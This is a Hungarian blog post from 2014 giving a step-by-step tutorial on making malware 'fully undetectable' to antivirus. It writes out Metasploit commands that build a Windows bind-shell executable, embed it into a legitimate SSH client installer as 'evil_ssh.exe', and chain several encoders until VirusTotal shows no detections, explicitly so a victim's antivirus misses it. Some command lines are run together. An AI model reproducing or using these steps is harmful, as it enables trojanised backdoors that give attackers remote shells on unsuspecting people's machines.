2014. január 28., kedd

Bypass/FuD - Virusirtó megkerülése

Ebben a bejegyzésben megmutatom lépésről lépésre,hogyan készítsünk egy vírusból olyan fájlt ami teljesen észrevehetetlen az antivirus programok számára.

Amire szükségünk lesz:
Metasploit (elérhető Backtrack/Kali)

Listener készítés:
cd

msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe





Most le kell csekkolnunk a virustotal.com -on és várni az eredményt.
Az eredmény az lesz amire számítottunk :)




Listener átkódolása!
A következő lépésben átkel kódolnunk a listenert és ha minden jól megy akkor a virustotal egyáltalán nem vagy minimális fertőzöttséget fog kimutatni. Azért van erre szükség,mert így kevesebb eséllyel fog minket lekapcsolni a victim -pc vírusirtója.



A következőket kell gépelnünk a terminálba:





wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e
x86/shikata_ga_nai -c 1ls -l evil






Most újra le kell ellenőrizni a virustotal.com és az eredmény:


 
Már látható,hogy az eredmény fényévekkel jobb mint az előző scannél azonban még mindig nem az igazi, ezért többször is átkel futtatnunk a listener.exe -t.

Terminálba gépeld:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1

msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1

msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen








Az újabb analyzis után az eredmény már tökéletes,a fájl nem fertőzött a vírusirtók nem veszik észre.:)







Nincsenek megjegyzések:

Megjegyzés küldése